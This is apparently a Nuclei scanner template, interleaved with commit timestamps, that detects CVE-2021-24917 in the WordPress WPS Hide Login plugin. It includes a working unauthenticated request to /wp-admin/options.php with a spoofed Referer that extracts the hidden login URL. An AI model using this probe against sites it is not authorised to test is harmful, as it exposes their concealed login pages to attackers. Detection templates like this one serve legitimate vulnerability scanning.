2022-08-31 19:45:11 +00:00
id : CVE-2021-24917
info :
2023-04-10 20:12:56 +00:00
name : WordPress WPS Hide Login <1.9.1 - Information Disclosure
2022-08-31 19:45:11 +00:00
author : akincibor
2022-09-01 11:20:25 +00:00
severity : high
2023-04-10 20:12:56 +00:00
description : WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.
2022-08-31 19:45:11 +00:00
reference :
- https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
- https://nvd.nist.gov/vuln/detail/CVE-2021-24917
2023-04-12 10:55:48 +00:00
- https://wordpress.org/support/topic/bypass-security-issue/
2023-04-04 21:01:24 +00:00
remediation : Fixed in version 1.9.1.
2022-09-01 11:20:25 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2021-24917
cwe-id : CWE-863
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:*:*:*
epss-score : 0.01446
2022-08-31 19:45:11 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2023-06-04 08:13:42 +00:00
verified : true
2022-09-01 11:20:25 +00:00
tags : cve2021,wp,wordpress,wp-plugin,unauth,wpscan,cve
2022-08-31 19:45:11 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-31 19:45:11 +00:00
- raw :
- |
GET /wp-admin/options.php HTTP/1.1
Host : {{Hostname}}
Referer : something
matchers-condition : and
matchers :
- type : word
2022-09-01 10:56:39 +00:00
part : header
2022-08-31 19:45:11 +00:00
words :
- 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'
2022-09-01 10:56:39 +00:00
2022-08-31 19:45:11 +00:00
- type : dsl
dsl :
2022-08-31 19:47:53 +00:00
- "!contains(tolower(location), 'wp-login.php')"
2022-09-01 10:56:39 +00:00
extractors :
- type : kval
kval :
- location
2023-04-04 21:01:24 +00:00
2023-04-10 20:12:56 +00:00
# Enhanced by cs on 2023/04/10